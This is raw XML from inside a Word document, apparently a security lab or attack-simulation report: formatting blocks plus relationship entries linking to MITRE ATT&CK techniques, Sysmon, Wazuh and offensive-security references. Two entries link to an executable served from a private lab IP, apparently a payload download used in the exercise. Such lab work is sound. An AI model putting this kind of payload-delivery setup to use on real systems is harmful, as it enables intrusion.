      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1455560686">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1466393428">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1469279643">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1491798609">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="333919234">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="85687420">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="639456539">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="781386723">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1353922181">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="162774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2476">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1604342917">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1628315847">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1684356203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1733238917">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1764105982">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1773355886">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1789347517">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1808665211">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1813332293">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="394745444">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="198322843">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="77386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13774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2026907250">
          <w:marLeft w:val="375"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="963121673">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="210"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="178085442">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="75"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="38321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915860">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1868717759">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1874534523">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1879126223">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1880242234">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1898740119">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1912890949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1913389517">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1935048370">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1948465931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="56977395">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="20526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19449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1977686285">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2006855544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2009407319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2049790631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2058124751">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2065635265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2073918718">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2088650379">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="386345236">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1250969874">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1273128940">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="191385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829">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xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png" Id="rId26"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.emf" Id="rId21"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png" Id="rId42"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png" Id="rId47"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png" Id="rId63"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pypi.org/project/uploadserver/" TargetMode="External" Id="rId68"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml" Id="rId2"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png" Id="rId16"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png" Id="rId29"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg" Id="rId11"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png" Id="rId24"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External" Id="rId32"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204/002/" TargetMode="External" Id="rId37"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001/" TargetMode="External" Id="rId40"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpg" Id="rId45"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png" Id="rId53"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon" TargetMode="External" Id="rId58"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png" Id="rId66"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId5"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png" Id="rId61"/><Relationship Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml" Id="rId19"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg" Id="rId14"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin" Id="rId22"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png" Id="rId27"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png" Id="rId30"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.2.4/8443.exe" TargetMode="External" Id="rId35"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg" Id="rId43"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png" Id="rId48"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wazuh.com/platform/overview/" TargetMode="External" Id="rId56"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png" Id="rId64"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets" TargetMode="External" Id="rId69"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId8"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" TargetMode="External" Id="rId51"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId72"/><Relationship 